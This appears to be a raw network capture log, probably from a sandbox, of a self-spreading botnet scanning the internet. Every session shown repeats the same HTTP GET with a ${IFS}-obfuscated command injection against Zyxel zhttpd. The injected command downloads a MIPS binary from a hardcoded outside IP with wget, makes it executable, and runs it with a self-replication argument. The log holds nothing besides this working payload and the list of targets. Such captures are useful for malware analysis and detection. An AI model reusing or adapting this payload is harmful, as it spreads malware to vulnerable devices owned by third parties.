                                      Jan 19, 2024 17:29:26.657270908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2958192.168.2.144065217.222.217.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.657280922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2959192.168.2.1436922198.52.46.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.657335043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2960192.168.2.1441416101.4.128.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.657366991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2961192.168.2.143954898.24.45.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.657411098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2962192.168.2.1437670175.79.189.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.657444000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2963192.168.2.143606849.192.16.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.657488108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2964192.168.2.1441512207.74.32.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.657514095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2965192.168.2.1443754171.27.43.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.657568932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2966192.168.2.1436956219.195.87.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.657608986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2967192.168.2.144945876.231.70.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.657641888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2968192.168.2.1454506108.152.222.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.657668114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2969192.168.2.1459926220.68.151.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.657711029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2970192.168.2.1450644201.90.211.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.657730103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2971192.168.2.1454396107.83.141.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.657788038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2972192.168.2.1447380175.44.185.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.657830954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2973192.168.2.1459522115.44.60.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.657866001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2974192.168.2.1454712190.255.196.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.657891989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2975192.168.2.145268682.114.190.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.657926083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2976192.168.2.144046214.193.55.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.657970905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2977192.168.2.1436192194.27.86.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.657994032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2978192.168.2.1443358111.17.63.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.658041000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2979192.168.2.144034640.166.91.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.658078909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2980192.168.2.1444074151.247.169.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.658103943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2981192.168.2.145332676.136.242.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.658153057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2982192.168.2.1456434132.25.159.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.658171892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2983192.168.2.144786670.89.196.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.658236027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2984192.168.2.1455654134.175.26.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.658272028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2985192.168.2.1459382114.146.22.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.658288956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2986192.168.2.1456582187.215.183.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.658314943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2987192.168.2.1459340155.243.223.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.658384085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2988192.168.2.143998670.165.35.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.658423901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2989192.168.2.143453432.185.159.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.658454895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2990192.168.2.14524202.11.124.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.658488035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2991192.168.2.1446378102.159.29.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.658525944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2992192.168.2.1441918126.57.104.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.658555031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2993192.168.2.1446066107.178.36.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.658601999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2994192.168.2.143642079.92.35.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.658607960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2995192.168.2.144947836.251.17.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.658677101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2996192.168.2.1448124145.82.163.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.658721924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2997192.168.2.143559682.81.138.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.658762932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2998192.168.2.143383087.107.198.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.658812046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2999192.168.2.1455372187.187.236.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.658844948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3000192.168.2.1445546210.210.39.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.658864975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3001192.168.2.144926298.10.18.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.658916950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3002192.168.2.145653854.127.255.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.658979893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3003192.168.2.14392085.179.91.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.659018993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3004192.168.2.1458886141.213.36.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.659058094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3005192.168.2.144983295.97.37.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.659096003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3006192.168.2.1453512118.128.219.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.659127951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3007192.168.2.1455502113.46.100.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.659153938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3008192.168.2.143294637.241.23.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.659194946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3009192.168.2.1457696107.210.147.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.659245014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3010192.168.2.1445756166.227.238.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.659286976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3011192.168.2.1454378151.221.184.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.659331083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3012192.168.2.143382878.6.162.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.659374952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3013192.168.2.145320034.90.83.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.659403086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3014192.168.2.1448094105.56.64.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.659451962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3015192.168.2.1451610142.245.72.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.659482002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3016192.168.2.1435390154.34.107.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.659512997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3017192.168.2.143724820.188.97.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.659563065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3018192.168.2.1455948162.239.24.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.659605980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3019192.168.2.143480267.108.133.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.659638882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3020192.168.2.14564484.228.207.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:26.659657001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3021192.168.2.1437376179.121.233.199443
                                      TimestampBytes transferredDirectionData
